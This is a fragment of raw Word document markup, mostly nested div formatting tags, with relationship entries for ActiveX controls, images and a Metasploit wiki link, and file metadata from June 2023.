                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="729109405">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="639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462">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="616254738">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="657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9085">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="2066484725">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                        </w:div>
                      </w:divsChild>
                    </w:div>
                    <w:div w:id="287199887">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="240"/>
                      <w:marBottom w:val="150"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="188875733">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                        </w:div>
                      </w:divsChild>
                    </w:div>
                    <w:div w:id="1533376789">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1195190621">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                        </w:div>
                        <w:div w:id="1672371642">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                        </w:div>
                      </w:divsChild>
                    </w:div>
                    <w:div w:id="545679386">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="240"/>
                      <w:marBottom w:val="150"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1036006418">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                        </w:div>
                      </w:divsChild>
                    </w:div>
                    <w:div w:id="1169246876">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1386752978">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                        </w:div>
                        <w:div w:id="693968189">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                        </w:div>
                        <w:div w:id="7496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18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX6.xml"/><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image" Target="media/image1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ntrol" Target="activeX/activeX8.xml"/><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github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.wmf"/><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6930</Words>
  <Characters>39503</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>329</Lines>
  <Paragraphs>92</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>46341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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-13T22:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-21T21:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>